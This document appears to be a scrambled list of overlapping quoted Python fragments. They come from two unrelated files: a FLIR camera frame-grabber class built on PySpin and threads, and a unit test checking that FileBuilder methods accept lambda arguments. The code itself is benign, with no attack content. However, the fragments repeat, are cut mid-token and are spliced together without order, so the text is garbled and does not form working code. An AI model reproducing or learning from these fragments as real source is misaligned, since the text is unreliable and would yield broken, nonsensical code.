=", "return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None): if serial is None:", "self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads = 1): if (self._is_running is", "self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True", ".99 * self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time = now def", "duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 *", "self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self,", "for i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start()", "None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self):", "import PySpin import threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False", "number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial)", "in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def", "serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera =", "if serial is None: raise Exception(\"Please provide a valid FLIR camera serial number\")", "False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit()", "/ duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame", "self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self): self.stop() if", "= serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width", "False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance()", "self._latest_camera_frame = frame now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps =", "None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index = index self._lock", "is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height", "del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def", "if (self._is_running is True): self._is_running = False for thread in self._threads: thread.join() del", "serial is None: raise Exception(\"Please provide a valid FLIR camera serial number\") self._serial", "self._index = index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock:", "self._is_camera_inited = True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is True):", "self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame):", "del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del", "def __init__(self, index): self._index = index self._lock = threading.Lock() def get_camera_frame(self, target): while", "(1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not None,", "with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img = frame.GetData().reshape(height, width)", "_is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0 def", "(self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del", "self._is_running = False for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is", "= False for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not", "None: raise Exception(\"Please provide a valid FLIR camera serial number\") self._serial = serial;", "0 _frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self): return self._camera def", "self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads = 1):", "is True): self._is_running = False for thread in self._threads: thread.join() del self._threads if", "thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame =", "self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None): if serial is None: raise", "time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time =", "stop(self): if (self._is_running is True): self._is_running = False for thread in self._threads: thread.join()", "index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame =", "= .99 * self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time = now", "* (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not", "self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running", "Exception(\"Please provide a valid FLIR camera serial number\") self._serial = serial; self._system =", "i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread)", "frame): self._latest_camera_frame = frame now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps", "is not None, self._latest_camera_frame def __init__(self, serial=None): if serial is None: raise Exception(\"Please", "True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear()", "time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01", "self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None class", "= threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running", "[] for i in range(num_threads): worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False)", "False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return", "self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now =", "self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del", "not True): self._is_running = True self._threads = [] for i in range(num_threads): worker", "return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self):", "True): self._is_running = False for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame", "self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition()", "= self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous)", "self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited", "import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time = 0", "def __init__(self, serial=None): if serial is None: raise Exception(\"Please provide a valid FLIR", "True): self._is_running = True self._threads = [] for i in range(num_threads): worker =", "num_threads = 1): if (self._is_running is not True): self._is_running = True self._threads =", "worker = FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if", "return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration =", "serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width =", "= self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False", "not None, self._latest_camera_frame def __init__(self, serial=None): if serial is None: raise Exception(\"Please provide", "raise Exception(\"Please provide a valid FLIR camera serial number\") self._serial = serial; self._system", "self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img = frame.GetData().reshape(height, width) target.set_latest_frame(img)", "PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height =", "def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None): if serial", "= 0 _frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self): return self._camera", "= True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited", "self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited", "self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration = now", "= self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited =", "_frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self):", "= time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps +", "PySpin import threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame", "import time import cv2 class FLIRFrameGrabber: _is_camera_inited = False _latest_camera_frame = None _last_frame_grab_time", "frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img = frame.GetData().reshape(height, width) target.set_latest_frame(img) frame.Release()", "now = time.time() duration = now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps", "duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def", "thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None class FrameGrabWorker:", "not None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index = index", "if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width", "daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running = False for", "is None: raise Exception(\"Please provide a valid FLIR camera serial number\") self._serial =", "if (self._latest_camera_frame is not None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index):", "deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited = False self._camera.EndAcquisition() self._camera.DeInit() del self._camera", "(self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame now", "self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is", "target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width, height = target.get_dimensions() img = frame.GetData().reshape(height,", "__init__(self, index): self._index = index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running():", "None, self._latest_camera_frame def __init__(self, serial=None): if serial is None: raise Exception(\"Please provide a", "self._system del self._serial def start(self, num_threads = 1): if (self._is_running is not True):", "_last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return self._is_running def get_camera(self): return", "def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame", "del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None class FrameGrabWorker: def", "def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps", "def set_latest_frame(self, frame): self._latest_camera_frame = frame now = time.time() duration = now -", "self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 / duration) self._last_frame_grab_time", "self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width()", "index): self._index = index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with", "1): if (self._is_running is not True): self._is_running = True self._threads = [] for", "threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running =", "False for thread in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None):", "self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init()", "_latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self): return self._is_running", "now def get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None): if", "self._camera.Width() self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def", "provide a valid FLIR camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance()", "in self._threads: thread.join() del self._threads if (self._latest_camera_frame is not None): self._latest_camera_frame = None", "self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial", "start(self, num_threads = 1): if (self._is_running is not True): self._is_running = True self._threads", "if (self._is_running is not True): self._is_running = True self._threads = [] for i", "= True self._threads = [] for i in range(num_threads): worker = FrameGrabWorker(i) thread", "= threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage() width,", "= PySpin.System.GetInstance() self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height", "True self._is_running = False def deinit(self): self.stop() if (self._is_camera_inited is True): self._is_camera_inited =", "<filename>flir_frame_grabber.py import PySpin import threading import time import cv2 class FLIRFrameGrabber: _is_camera_inited =", "self._camera_list = self._system.GetCameras() self._camera = self._camera_list.GetBySerial(serial) self._camera.Init() self._camera_width = self._camera.Width() self._camera_height = self._camera.Height()", "is_running(self): return self._is_running def get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def", "= 1): if (self._is_running is not True): self._is_running = True self._threads = []", "= None class FrameGrabWorker: def __init__(self, index): self._index = index self._lock = threading.Lock()", "serial=None): if serial is None: raise Exception(\"Please provide a valid FLIR camera serial", "= now - self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0", "get_latest_frame(self): return self._latest_camera_frame is not None, self._latest_camera_frame def __init__(self, serial=None): if serial is", "= False self._camera.EndAcquisition() self._camera.DeInit() del self._camera del self._camera_width del self._camera_height self._camera_list.Clear() del self._camera_list", "(self._is_running is True): self._is_running = False for thread in self._threads: thread.join() del self._threads", "is not None): self._latest_camera_frame = None class FrameGrabWorker: def __init__(self, index): self._index =", "= index self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame", "- self._last_frame_grab_time self._frame_grab_fps = .99 * self._frame_grab_fps + .01 * (1.0 / duration)", "thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True):", "is not True): self._is_running = True self._threads = [] for i in range(num_threads):", "+ .01 * (1.0 / duration) self._last_frame_grab_time = now def get_latest_frame(self): return self._latest_camera_frame", "self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads =", "= FrameGrabWorker(i) thread = threading.Thread(target=worker.get_camera_frame, args=(self,), daemon=False) thread.start() self._threads.append(thread) def stop(self): if (self._is_running", "self._serial def start(self, num_threads = 1): if (self._is_running is not True): self._is_running =", "get_camera(self): return self._camera def get_dimensions(self): return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def", "return (self._camera_width, self._camera_height) def get_fps(self): return self._frame_grab_fps def set_latest_frame(self, frame): self._latest_camera_frame = frame", "def stop(self): if (self._is_running is True): self._is_running = False for thread in self._threads:", "FrameGrabWorker: def __init__(self, index): self._index = index self._lock = threading.Lock() def get_camera_frame(self, target):", "FLIR camera serial number\") self._serial = serial; self._system = PySpin.System.GetInstance() self._camera_list = self._system.GetCameras()", "= False _latest_camera_frame = None _last_frame_grab_time = 0 _frame_grab_fps = 0 def is_running(self):", "thread.start() self._threads.append(thread) def stop(self): if (self._is_running is True): self._is_running = False for thread", "True self._threads = [] for i in range(num_threads): worker = FrameGrabWorker(i) thread =", "self._lock = threading.Lock() def get_camera_frame(self, target): while target.is_running(): with self._lock: frame = target.get_camera().GetNextImage()", "del self._camera_height self._camera_list.Clear() del self._camera_list self._system.ReleaseInstance() del self._system del self._serial def start(self, num_threads", "self._camera_height = self._camera.Height() self._camera.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous) self._camera.BeginAcquisition() self._is_camera_inited = True self._is_running = False def deinit(self):" ]
[ "arguments. Tests that ``FileBuilder`` methods accept lambdas for arguments that must be callables.", "from .. import FileBuilder from .file_builder_test import FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder``", "'subbuild', lambda builder, dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self): \"\"\"Test that ``FileBuilder``", "\"\"\"Build file function for ``LambdaTest``.\"\"\" self._write(filename, 'text') def _subbuild(self, builder, dir_): \"\"\"Subbuild function", "filename: self._write(filename, 'text')) def _build(self, builder): \"\"\"Build function for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild,", "'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename,", "be callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir,", "os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self): \"\"\"Test that ``FileBuilder`` methods accept lambda arguments. Test that", "'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test', lambda builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'),", "def test_lambda(self): \"\"\"Test that ``FileBuilder`` methods accept lambda arguments. Test that ``FileBuilder`` methods", "be callables. \"\"\" def _build_file(self, builder, filename): \"\"\"Build file function for ``LambdaTest``.\"\"\" self._write(filename,", "builder, dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self): \"\"\"Test that ``FileBuilder`` methods accept", "arguments that must be callables. \"\"\" def _build_file(self, builder, filename): \"\"\"Build file function", "'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text')", "test_lambda(self): \"\"\"Test that ``FileBuilder`` methods accept lambda arguments. Test that ``FileBuilder`` methods accept", "file function for ``LambdaTest``.\"\"\" self._write(filename, 'text') def _subbuild(self, builder, dir_): \"\"\"Subbuild function for", "lambda builder, dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self): \"\"\"Test that ``FileBuilder`` methods", "'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test', lambda builder: self._build(builder))", "FileBuilder.build( self._cache_filename, 'lambda_test', lambda builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir,", "def _build(self, builder): \"\"\"Build function for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild(", "methods accept lambda arguments. Tests that ``FileBuilder`` methods accept lambdas for arguments that", "'Output1.txt'), 'build_file', self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file', lambda builder, filename: self._write(filename, 'text')) def", "methods accept lambdas for arguments that must be callables. \"\"\" def _build_file(self, builder,", "'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text') self._check_contents(", "import FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder`` methods accept lambda arguments. Tests that", "callables. \"\"\" def _build_file(self, builder, filename): \"\"\"Build file function for ``LambdaTest``.\"\"\" self._write(filename, 'text')", "self._cache_filename, 'lambda_test', lambda builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1',", "FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text')", "dir_): \"\"\"Subbuild function for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'),", "``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file', lambda builder, filename:", "filename): \"\"\"Build file function for ``LambdaTest``.\"\"\" self._write(filename, 'text') def _subbuild(self, builder, dir_): \"\"\"Subbuild", "self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2',", "lambda builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text')", "'build_file', lambda builder, filename: self._write(filename, 'text')) def _build(self, builder): \"\"\"Build function for ``LambdaTest``.\"\"\"", "self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2',", "accept lambdas for arguments that must be callables. \"\"\" def _build_file(self, builder, filename):", "os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'),", "builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents(", "lambda arguments. Tests that ``FileBuilder`` methods accept lambdas for arguments that must be", "def _subbuild(self, builder, dir_): \"\"\"Subbuild function for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file)", "``FileBuilder`` methods accept lambdas for arguments that must be callables. \"\"\" def _build_file(self,", "os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test', lambda builder:", "accept lambda arguments. Test that ``FileBuilder`` methods accept lambdas for arguments that must", "for arguments that must be callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1',", "'Dir2')) def test_lambda(self): \"\"\"Test that ``FileBuilder`` methods accept lambda arguments. Test that ``FileBuilder``", "dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self): \"\"\"Test that ``FileBuilder`` methods accept lambda", "os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild', lambda builder, dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self):", "os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file', lambda builder, filename: self._write(filename, 'text'))", "accept lambda arguments. Tests that ``FileBuilder`` methods accept lambdas for arguments that must", "\"\"\"Tests that ``FileBuilder`` methods accept lambda arguments. Tests that ``FileBuilder`` methods accept lambdas", "\"\"\"Build function for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild', lambda builder,", ".file_builder_test import FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder`` methods accept lambda arguments. Tests", "os.path.join(dir_, 'Output2.txt'), 'build_file', lambda builder, filename: self._write(filename, 'text')) def _build(self, builder): \"\"\"Build function", "builder, filename: self._write(filename, 'text')) def _build(self, builder): \"\"\"Build function for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild',", "'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test', lambda builder: self._build(builder)) self._check_contents(", "_build(self, builder): \"\"\"Build function for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild',", "builder.subbuild( 'subbuild', lambda builder, dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self): \"\"\"Test that", "self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir,", "lambda arguments. Test that ``FileBuilder`` methods accept lambdas for arguments that must be", "function for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file', lambda", "that ``FileBuilder`` methods accept lambda arguments. Test that ``FileBuilder`` methods accept lambdas for", "``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild', lambda builder, dir_: self._subbuild(builder, dir_),", "Test that ``FileBuilder`` methods accept lambdas for arguments that must be callable. \"\"\"", "'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir,", "'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test', lambda builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir,", "``FileBuilder`` methods accept lambdas for arguments that must be callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test',", "'Dir1')) builder.subbuild( 'subbuild', lambda builder, dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self): \"\"\"Test", "that must be callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text')", "\"\"\"Test that ``FileBuilder`` methods accept lambda arguments. Test that ``FileBuilder`` methods accept lambdas", "arguments. Test that ``FileBuilder`` methods accept lambdas for arguments that must be callable.", "must be callables. \"\"\" def _build_file(self, builder, filename): \"\"\"Build file function for ``LambdaTest``.\"\"\"", "that ``FileBuilder`` methods accept lambdas for arguments that must be callable. \"\"\" FileBuilder.build(self._cache_filename,", "builder, dir_): \"\"\"Subbuild function for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file) builder.build_file( os.path.join(dir_,", "\"\"\"Subbuild function for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file',", "self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir,", "'Output2.txt'), 'build_file', lambda builder, filename: self._write(filename, 'text')) def _build(self, builder): \"\"\"Build function for", "LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder`` methods accept lambda arguments. Tests that ``FileBuilder`` methods accept", "self._write(filename, 'text')) def _build(self, builder): \"\"\"Build function for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir,", ".. import FileBuilder from .file_builder_test import FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder`` methods", "lambdas for arguments that must be callables. \"\"\" def _build_file(self, builder, filename): \"\"\"Build", "builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file', lambda builder, filename: self._write(filename,", "lambda 